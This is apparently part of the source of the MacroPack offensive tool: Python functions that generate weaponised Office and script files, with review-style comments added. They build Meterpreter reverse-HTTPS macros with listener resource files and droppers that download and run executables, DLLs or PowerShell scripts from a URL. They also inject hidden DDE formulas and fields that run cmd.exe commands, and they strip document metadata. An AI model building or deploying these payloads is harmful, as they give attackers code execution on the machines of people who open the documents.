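def _processWebMeterTemplate(self):
    """Generate the reverse-HTTPS meterpreter template (VBA and VBS based).

    Prompts for ``rhost``/``rport``, fills the WEBMETER VBA template with
    them, registers the result as a VBA module, and writes a ``webmeter.rc``
    msfconsole resource file next to the output file so the operator can
    start the matching listener.
    """
    paramArray = [MPParam("rhost"), MPParam("rport")]
    self.fillInputParams(paramArray)
    rhost = getParamValue(paramArray, "rhost")
    rport = getParamValue(paramArray, "rport")

    # VBA side: the values are spliced in verbatim (no validation/escaping),
    # so a stray double quote in rhost/rport breaks the generated VBA.
    content = vbLib.templates.WEBMETER
    content = content.replace("<<<RHOST>>>", rhost)
    content = content.replace("<<<RPORT>>>", rport)
    content = content + vbLib.WebMeter.VBA
    vbaFile = self.addVBAModule(content)
    logging.debug(" [-] Template %s VBA generated in %s" % (self.template, vbaFile))

    # Listener side: the RC template names the same endpoint LHOST/LPORT.
    rc_content = vbLib.templates.WEBMETER_RC
    rc_content = rc_content.replace("<<<LHOST>>>", rhost)
    rc_content = rc_content.replace("<<<LPORT>>>", rport)

    # Write the RC file beside the generated document. The context manager
    # closes the handle even when the write fails (the original leaked it on
    # error), and write() replaces writelines(), which iterated the string
    # character by character.
    rcFilePath = os.path.join(os.path.dirname(self.outputFilePath), "webmeter.rc")
    with open(rcFilePath, 'w') as f:
        f.write(rc_content)
    logging.info(" [-] Meterpreter resource file generated in %s" % rcFilePath)
    logging.info(" [-] Execute listener with 'msfconsole -r %s'" % rcFilePath)
    logging.info(" [-] OK!")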
def _processDropper2Template(self):
    """Generate the DROPPER2 template (VBA and VBS based).

    Prompts for the download URL and an optional drop path. When the path
    is left empty, a random 8-letter name carrying the URL's extension is
    used; the path is then converted to its VBA form before substitution.
    """
    realPathKey = "File name in TEMP or full file path (environment variables can be used)."
    paramArray = [
        MPParam("target_url"),
        MPParam(realPathKey, optional=True),
    ]
    self.fillInputParams2(paramArray)
    targetUrl = getParamValue(paramArray, "target_url")
    downloadPath = getParamValue(paramArray, realPathKey)

    # Default drop name: random letters plus whatever splitext() considers the
    # extension of the raw URL (a query string would end up in that suffix).
    if downloadPath == "":
        downloadPath = utils.randomAlpha(8) + os.path.splitext(targetUrl)[1]
    downloadPath = self._targetPathToVba(downloadPath)

    # Execution helpers the template relies on.
    for helper in (vbLib.WscriptExec, vbLib.WmiExec, vbLib.ExecuteCMDAsync):
        self.addVBLib(helper)

    # Both values are inserted verbatim into the VBA source (no escaping).
    content = vbLib.templates.DROPPER2
    content = content.replace("<<<URL>>>", targetUrl).replace("<<<DOWNLOAD_PATH>>>", downloadPath)
    vbaFile = self.addVBAModule(content)
    logging.debug(" [-] Template %s VBA generated in %s" % (self.template, vbaFile))
    logging.info(" [-] OK!")
def _processDropperDllTemplate(self):
    """Generate the DLL dropper template: download a DLL and call one export.

    Prompts for ``URL`` and ``Dll_Function``. Script formats (HTA, VBS, WSF,
    SCT, XSL) get one VBS module with both values inline. Office formats get
    two VBA modules: the invoker (DROPPER_DLL2) and a host-specific
    downloader (DROPPER_DLL1) that references the invoker module by name.
    """
    paramArray = [MPParam("URL"), MPParam("Dll_Function")]
    self.fillInputParams(paramArray)
    dllUrl = getParamValue(paramArray, "URL")
    dllFct = getParamValue(paramArray, "Dll_Function")

    scriptFormats = [MSTypes.HTA, MSTypes.VBS, MSTypes.WSF, MSTypes.SCT, MSTypes.XSL]
    if self.outputFileType in scriptFormats:
        # Single VBS module carrying the download URL and the export name.
        content = vbLib.templates.DROPPER_DLL_VBS
        content = content.replace("<<<DLL_URL>>>", dllUrl)
        content = content.replace("<<<DLL_FUNCTION>>>", dllFct)
        vbaFile = self.addVBAModule(content)
        logging.debug(" [-] Template %s VBS generated in %s" % (self.template, vbaFile))
        logging.info(" [-] OK!")
        return

    # Module 2: the invoker that calls the exported function.
    invokerContent = vbLib.templates.DROPPER_DLL2.replace("<<<DLL_FUNCTION>>>", dllFct)
    invokerModule = self.addVBAModule(invokerContent)
    logging.debug(" [-] Template %s VBA generated in %s" % (self.template, invokerModule))

    # Module 1: the downloader, tailored to the host application.
    # First matching marker wins, in this order (XL before WD etc.).
    hostApps = (
        (MSTypes.XL, MSTypes.XL),
        (MSTypes.WD, MSTypes.WD),
        (MSTypes.PPT, "PowerPoint"),
        (MSTypes.VSD, "Visio"),
        (MSTypes.MPP, "Project"),
    )
    msApp = MSTypes.UNKNOWN
    for marker, appName in hostApps:
        if marker in self.outputFileType:
            msApp = appName
            break

    invokerName = os.path.splitext(os.path.basename(invokerModule))[0]
    content = vbLib.templates.DROPPER_DLL1
    content = content.replace("<<<DLL_URL>>>", dllUrl)
    content = content.replace("<<<APPLICATION>>>", msApp)
    content = content.replace("<<<MODULE_2>>>", invokerName)
    vbaFile = self.addVBAModule(content)
    logging.debug(" [-] Second part of Template %s VBA generated in %s" % (self.template, vbaFile))
    logging.info(" [-] OK!")
def _processEmbedExeTemplate(self):
    """Drop and execute the embedded file (EMBED_EXE template).

    Takes optional command line parameters for the dropped executable. The
    drop name is 7 random letters plus the embedded file's extension, under
    %temp% on the target.
    """
    paramKey = "Command line parameters"
    paramArray = [MPParam(paramKey, optional=True)]
    self.fillInputParams2(paramArray)

    extension = os.path.splitext(self.mpSession.embeddedFilePath)[1]
    fileName = utils.randomAlpha(7) + extension
    logging.info(" [-] File extraction path: %%temp%%\\%s" % fileName)

    # Execution helpers the template relies on.
    for helper in (vbLib.WscriptExec, vbLib.WmiExec, vbLib.ExecuteCMDAsync):
        self.addVBLib(helper)

    # Parameters are appended as a VBA string concatenation; they are not
    # escaped, so a double quote inside them breaks the generated VBA.
    extraArgs = getParamValue(paramArray, paramKey)
    parameters = " & \" %s\"" % extraArgs if extraArgs != "" else ""

    content = vbLib.templates.EMBED_EXE
    content = content.replace("<<<FILE_NAME>>>", fileName)
    content = content.replace("<<<PARAMETERS>>>", parameters)
    vbaFile = self.addVBAModule(content)
    logging.debug(" [-] Template %s VBA generated in %s" % (self.template, vbaFile))
    logging.info(" [-] OK!")
def check(self):
    """Collect the command line for this payload; always returns True.

    When an HTA macro is already set on the session the prompt is skipped
    entirely; otherwise the answer is stored in ``mpSession.dosCommand``.
    """
    if self.mpSession.htaMacro:
        return True
    paramArray = [MPParam("Command line")]
    self.fillInputParams(paramArray)
    self.mpSession.dosCommand = getParamValue(paramArray, "Command line")
    return True
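def _processEmbedDllTemplate(self):
    """Generate the EMBED_DLL template: call an export of the embedded DLL.

    Prompts for ``Dll_Function``. Script formats get one VBS module
    (EMBED_DLL_VBS); Office formats get two VBA modules: the invoker
    (DROPPER_DLL2) and a host-specific extractor (EMBED_DLL_VBA) that
    references the invoker module by name.
    """
    paramArray = [MPParam("Dll_Function")]
    self.fillInputParams(paramArray)
    dllFct = getParamValue(paramArray, "Dll_Function")

    # NOTE(review): the original tested `outputFileType in [MSTypes.VBSCRIPTS_FORMATS]`,
    # i.e. membership in a one-element list wrapping the formats collection,
    # which only matches when outputFileType *is* that whole collection. Test
    # the collection itself, as the sibling DLL dropper does with its format
    # list (assumes VBSCRIPTS_FORMATS is the list of script formats).
    if self.outputFileType in MSTypes.VBSCRIPTS_FORMATS:
        content = vbLib.templates.EMBED_DLL_VBS
        content = content.replace("<<<DLL_FUNCTION>>>", dllFct)
        vbaFile = self.addVBAModule(content)
        logging.debug(" [-] Template %s VBS generated in %s" % (self.template, vbaFile))
        logging.info(" [-] OK!")
        return

    # Module 2: the invoker that calls the exported function.
    invokerContent = vbLib.templates.DROPPER_DLL2.replace("<<<DLL_FUNCTION>>>", dllFct)
    invokerModule = self.addVBAModule(invokerContent)
    logging.debug(" [-] Template %s VBA generated in %s" % (self.template, invokerModule))

    # Module 1: extractor tailored to the host application; first matching
    # marker wins, in this order.
    hostApps = (
        (MSTypes.XL, MSTypes.XL),
        (MSTypes.WD, MSTypes.WD),
        (MSTypes.PPT, "PowerPoint"),
        (MSTypes.VSD, "Visio"),
        (MSTypes.MPP, "Project"),
    )
    msApp = MSTypes.UNKNOWN
    for marker, appName in hostApps:
        if marker in self.outputFileType:
            msApp = appName
            break

    invokerName = os.path.splitext(os.path.basename(invokerModule))[0]
    content = vbLib.templates.EMBED_DLL_VBA
    content = content.replace("<<<APPLICATION>>>", msApp)
    content = content.replace("<<<MODULE_2>>>", invokerName)
    vbaFile = self.addVBAModule(content)
    logging.debug(" [-] Second part of Template %s VBA generated in %s" % (self.template, vbaFile))
    logging.info(" [-] OK!")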
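def check(self):
    """Collect the target for this payload; always returns True.

    Resets ``self.targetPath``. When no HTA macro is set on the session, the
    user is asked for a path or a command line: a value ending in .dll,
    .sct or .exe becomes ``self.targetPath``, anything else is stored as a
    DOS command line in ``mpSession.dosCommand``.
    """
    self.targetPath = ""
    dictKey = "Target path (.exe, .dll, .sct) or command line"
    if not self.mpSession.htaMacro:
        paramArray = [MPParam(dictKey)]
        self.fillInputParams(paramArray)
        value = getParamValue(paramArray, dictKey)
        # Classify the user-supplied value. The original inspected
        # self.targetPath, which had just been reset to "", so the extension
        # branches could never fire and every input became a command line.
        # NOTE(review): callers that relied on dosCommand always being set
        # should be checked against this corrected behaviour.
        if str(value).lower().endswith((".dll", ".sct", ".exe")):
            self.targetPath = value
        else:
            self.mpSession.dosCommand = value
    return True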
def check(self):
    """Verify prerequisites and collect the command line.

    Returns False (after logging an error) when not running on Windows,
    since this format can only be built there. Otherwise, unless an HTA
    macro is already set on the session, prompts for the command line and
    stores it in ``mpSession.dosCommand``; returns True.
    """
    if sys.platform != "win32":
        logging.error(" [!] You have to run on Windows OS to build this file format.")
        return False
    if self.mpSession.htaMacro:
        return True
    paramArray = [MPParam("Command line")]
    self.fillInputParams(paramArray)
    self.mpSession.dosCommand = getParamValue(paramArray, "Command line")
    return True
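def generate(self):
    """Generate the URL shortcut file from URL_TEMPLATE.

    Prompts for ``targetUrl``, substitutes it into the template verbatim
    (no escaping) and writes the result to ``self.outputFilePath``.
    """
    logging.info(" [+] Generating %s file..." % self.outputFileType)
    paramArray = [MPParam("targetUrl")]
    self.fillInputParams(paramArray)

    urlContent = URL_TEMPLATE.replace("<<<URL>>>", getParamValue(paramArray, "targetUrl"))

    # Write the URL file. The context manager closes the handle even if the
    # write fails (the original leaked it on error); write() replaces
    # writelines(), which iterated the string character by character. Text
    # mode with the platform default encoding is kept as in the original.
    with open(self.outputFilePath, 'w') as f:
        f.write(urlContent)
    logging.info(" [-] Generated URL file: %s" % self.outputFilePath)
    logging.info(" [-] Test with : \n Click on %s file to test.\n" % self.outputFilePath)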
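def generate(self):
    """Generate the GLK file from GLK_TEMPLATE.

    Prompts for ``targetUrl``, substitutes it into the template verbatim
    (no escaping) and writes the result to ``self.outputFilePath``.
    """
    logging.info(" [+] Generating %s file..." % self.outputFileType)
    paramArray = [MPParam("targetUrl")]
    self.fillInputParams(paramArray)
    targetUrl = getParamValue(paramArray, "targetUrl")

    glkContent = GLK_TEMPLATE.replace("<<<URL>>>", targetUrl)

    # Write the GLK file. The context manager closes the handle even if the
    # write fails (the original leaked it on error); write() replaces
    # writelines(), which iterated the string character by character. Text
    # mode with the platform default encoding is kept as in the original.
    with open(self.outputFilePath, 'w') as f:
        f.write(glkContent)
    logging.info(" [-] Generated GLK file: %s" % self.outputFilePath)
    logging.info(" [-] Test with : \n Click on %s file to test.\n" % self.outputFilePath)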
def _processCmdTemplate(self):
    """Build the CMD template: a macro that runs the supplied command line.

    Stores the command in ``mpSession.dosCommand``, registers the execution
    helpers, and adds the CMD template as a VBA module.
    """
    paramArray = [MPParam("Command line")]
    self.fillInputParams(paramArray)
    cmdLine = getParamValue(paramArray, "Command line")
    self.mpSession.dosCommand = cmdLine

    # Execution helpers the template relies on.
    for helper in (vbLib.WscriptExec, vbLib.WmiExec, vbLib.ExecuteCMDAsync):
        self.addVBLib(helper)

    content = vbLib.templates.CMD
    # Only the Community edition substitutes the command here (verbatim, no
    # escaping); for other editions the <<<CMDLINE>>> placeholder is left in
    # place — presumably handled later in the pipeline, not visible here.
    if self.mpSession.mpType == "Community":
        content = content.replace("<<<CMDLINE>>>", cmdLine)
    vbaFile = self.addVBAModule(content)
    logging.info(" [-] Template %s VBA generated in %s" % (self.template, vbaFile))
def _processPowershellDropperTemplate(self):
    """Generate the PowerShell dropper template (DROPPER_PS).

    Prompts for ``powershell_script_url``, inserts it verbatim into the
    template, registers the execution helpers and adds the VBA module.
    """
    paramKey = "powershell_script_url"
    paramArray = [MPParam(paramKey)]
    self.fillInputParams(paramArray)

    # Execution helpers the template relies on.
    for helper in (vbLib.WscriptExec, vbLib.WmiExec, vbLib.ExecuteCMDAsync):
        self.addVBLib(helper)

    # The URL is not escaped; a double quote in it breaks the generated VBA.
    scriptUrl = getParamValue(paramArray, paramKey)
    content = vbLib.templates.DROPPER_PS.replace("<<<POWERSHELL_SCRIPT_URL>>>", scriptUrl)
    vbaFile = self.addVBAModule(content)
    logging.debug(" [-] Template %s VBA generated in %s" % (self.template, vbaFile))
    logging.info(" [-] OK!")
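def generate(self):
    """Generate the MS Library shortcut file from LIBRARY_MS_TEMPLATE.

    Prompts for ``targetUrl``; substitutes it and ``mpSession.icon`` into
    the template verbatim (no escaping) and writes the result to
    ``self.outputFilePath``.
    """
    logging.info(" [+] Generating %s file..." % self.outputFileType)
    paramArray = [MPParam("targetUrl")]
    self.fillInputParams(paramArray)
    targetUrl = getParamValue(paramArray, "targetUrl")

    content = LIBRARY_MS_TEMPLATE
    content = content.replace("<<<TARGET>>>", targetUrl)
    content = content.replace("<<<ICON>>>", self.mpSession.icon)

    # Write the library-ms file. The context manager closes the handle even
    # if the write fails (the original leaked it on error); write() replaces
    # writelines(), which iterated the string character by character. Text
    # mode with the platform default encoding is kept as in the original.
    with open(self.outputFilePath, 'w') as f:
        f.write(content)
    logging.info(" [-] Generated MS Library Shortcut file: %s" % self.outputFilePath)
    logging.info(" [-] Test with : \n Click on %s file to test.\n" % self.outputFilePath)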
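def insertDDE(self):
    """Inject a DDE formula into the generated Excel workbook via COM.

    Prompts for the command line, opens ``self.outputFilePath`` with Excel
    automation (auto-open macros force-disabled, window hidden), writes a
    hidden DDE formula into cell Z1 (row 1, column 26), strips document
    metadata, saves and closes the workbook, then quits Excel. Windows and
    pywin32 only.
    """
    logging.info(" [+] Include DDE attack...")
    paramArray = [MPParam("Command line")]
    self.fillInputParams(paramArray)
    command = getParamValue(paramArray, "Command line")

    logging.info(" [-] Open document...")
    excel = win32com.client.Dispatch("Excel.Application")
    # Force-disable auto-open macros so nothing the workbook carries runs on
    # the operator's machine while it is edited; restored in the finally.
    secAutomation = excel.Application.AutomationSecurity
    msoAutomationSecurityForceDisable = 3
    excel.Application.AutomationSecurity = msoAutomationSecurityForceDisable
    # Work in the background without showing the Excel window.
    excel.Visible = False
    try:
        workbook = excel.Workbooks.Open(self.outputFilePath)

        logging.info(" [-] Inject DDE field (Answer 'No' to popup)...")
        # The command is spliced into the formula verbatim; a single quote in
        # it terminates the DDE topic early (no escaping is attempted).
        ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!'A1'""" % command.rstrip()
        excel.Cells(1, 26).Formula = ddeCmd
        excel.Cells(1, 26).FormulaHidden = True

        logging.info(" [-] Remove hidden data and personal info...")
        xlRDIAll = 99
        workbook.RemoveDocumentInformation(xlRDIAll)

        logging.info(" [-] Save Document...")
        excel.DisplayAlerts = False
        excel.Workbooks(1).Close(SaveChanges=1)
    finally:
        # Always restore the automation setting and quit: the original only
        # cleaned up on the happy path (a failed step left a hidden Excel
        # process alive) and reset the setting after Quit(), where it no
        # longer has any effect.
        try:
            excel.Application.AutomationSecurity = secAutomation
        finally:
            excel.Application.Quit()
            del excel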
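def generate(self):
    """Generate the SettingContent-ms shortcut file from SETTINGS_MS_TEMPLATE.

    Prompts for the command line; substitutes it and ``mpSession.icon`` into
    the template verbatim (no escaping) and writes the result to
    ``self.outputFilePath``. As the closing log line states, this technique
    has been patched (CVE-2018-8414) and is kept for completeness only.
    """
    logging.info(" [+] Generating %s file..." % self.outputFileType)
    paramArray = [MPParam("Command line")]
    self.fillInputParams(paramArray)

    content = SETTINGS_MS_TEMPLATE
    content = content.replace("<<<CMD>>>", getParamValue(paramArray, "Command line"))
    content = content.replace("<<<ICON>>>", self.mpSession.icon)

    # Write the settings shortcut file. The context manager closes the handle
    # even if the write fails (the original leaked it on error); write()
    # replaces writelines(), which iterated the string character by character.
    # Text mode with the platform default encoding is kept as in the original.
    with open(self.outputFilePath, 'w') as f:
        f.write(content)
    logging.info(" [-] Generated Settings Shortcut file: %s" % self.outputFilePath)
    logging.info(" [-] Test with: Double click on %s file." % self.outputFilePath)
    logging.info(
        " [!] The attack via SettingContent-ms has been patched as CVE-2018-8414. \n This payload is kept in MacroPack but its useless in offensive security scenario.\n"
    )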
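def insertDDE(self):
    """Inject a DDEAUTO field into the generated Word document via COM.

    Prompts for the command line, opens ``self.outputFilePath`` with Word
    automation (window hidden, auto-open macros force-disabled), adds a
    DDEAUTO field at the current selection, strips document metadata, saves
    and closes the document, then quits Word. Windows and pywin32 only.
    """
    logging.info(" [+] Include DDE attack...")
    paramArray = [MPParam("Command line")]
    self.fillInputParams(paramArray)
    command = getParamValue(paramArray, "Command line")

    logging.info(" [-] Open document...")
    word = win32com.client.Dispatch("Word.Application")
    # Mirror the Excel DDE path: force-disable auto-open macros while the
    # document is open under automation, so anything the generated document
    # may carry does not run on the operator's host; restored in the finally.
    secAutomation = word.Application.AutomationSecurity
    msoAutomationSecurityForceDisable = 3
    word.Application.AutomationSecurity = msoAutomationSecurityForceDisable
    # Work in the background without showing the Word window.
    word.Visible = False
    try:
        document = word.Documents.Open(self.outputFilePath)

        logging.info(" [-] Inject DDE field (Answer 'No' to popup)...")
        # The command is spliced into the field text verbatim (no escaping).
        ddeCmd = r'"\"c:\\Program Files\\Microsoft Office\\MSWORD\\..\\..\\..\\windows\\system32\\cmd.exe\" /c %s" "."' % command.rstrip()
        wdFieldDDEAuto = 46
        document.Fields.Add(Range=word.Selection.Range,
                            Type=wdFieldDDEAuto,
                            Text=ddeCmd,
                            PreserveFormatting=False)

        # Silence prompts before touching metadata and saving.
        word.DisplayAlerts = False
        logging.info(" [-] Remove hidden data and personal info...")
        wdRDIAll = 99
        document.RemoveDocumentInformation(wdRDIAll)

        logging.info(" [-] Save Document...")
        document.Save()
        document.Close()
    finally:
        # Always restore the automation setting and quit: the original only
        # quit on the happy path, so a failed step left a hidden Word
        # process alive.
        try:
            word.Application.AutomationSecurity = secAutomation
        finally:
            word.Application.Quit()
            del word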